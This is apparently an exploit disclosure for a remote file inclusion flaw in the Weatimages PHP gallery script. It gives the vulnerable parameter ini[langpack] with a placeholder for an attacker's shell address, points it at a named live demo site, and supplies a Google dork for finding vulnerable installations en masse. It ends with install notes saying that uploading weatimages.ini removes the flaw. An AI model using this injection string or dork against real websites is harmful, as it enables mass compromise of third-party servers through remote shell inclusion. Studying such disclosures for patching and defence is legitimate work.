RFI Weatimages Hack
Script name : Weatimages
Script Download Adress:http://www.hotscripts.com/jump.php?listing_id=52592&jump_type=1
Demo site:http://www.nazarkin.name/projects/weatimages/demo/index.php?ini[langpack]=shelladress
Google Dork : inurl: index.php?ini[langpack]=
Contact:[email protected]
Note:Thanx to ForeveRIslam
side note:
Unpack file "index.php" from this archive and upload it to separate directory (e.g. "photos/") on your web server.
In order to enable caching capabilities, you need to create the new directory named "weatimages-cache" in directory
with "index.php" and to set access rights 777 (rwxrwxrwx) to "weatimages-cache".
If you plan to customize configuration, upload "weatimages.ini" too.
If weatimages.ini was uploaded too then the product isn't vulnerable.